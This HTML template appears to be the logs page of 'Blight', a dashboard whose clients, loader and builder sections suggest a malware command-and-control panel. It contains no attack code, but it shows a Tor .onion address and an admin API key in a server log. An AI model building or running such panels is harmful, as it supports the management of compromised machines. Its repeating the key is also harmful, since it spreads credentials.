<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Blight - Logs</title>
    <link rel="stylesheet" href="{{ url_for('static',filename='css/stylesheet.css') }}" />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css"
    />
    <script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
  </head>
  <body>
    <nav class="navbar">
      <ul>
        <img class="logo" src="{{ url_for('static',filename='misc/logo.png') }}" />
        <li>
          <a href="clients"><i class="fas fa-user"></i></a>
        </li>
        <li>
          <a href="loader"><i class="fas fa-inbox"></i></a>
        </li>
        <li>
          <a href="logs"><i class="fas fa-envelope"></i></a>
        </li>
        <li>
          <a href="builder"><i class="fas fa-screwdriver-wrench"></i></a>
        </li>
        <li>
          <a href="#"><i class="fas fa-cog"></i></a>
        </li>
        
      </ul>
    </nav>

    <textarea>
  ___   ___       __   ___   ____  __    _    __    _    
   ) ) ( (_)     ( (` | |_) | |_  / /`  | |  / /\  | |   
  _)_) (_(_)     _)_) |_|   |_|__ \_\_, |_| /_/--\ |_|__ 
  
[+] Server initialized! Running on http://jgka01mbwqlzti2aqbjoieisne4ubyuoeiiugel2layyudcfrwln76qd.onion/ and http://127.0.0.1:8080/
[#] Admin API key: 00BA505835607AC55BDE27DD3F7D922AF6120425CD6480A0DBC49B118839E670ED45C37B629E63E03A15DE0414230DA921BC519A16517BC831563CC7A40FDC00

</textarea>
  </body>
</html>
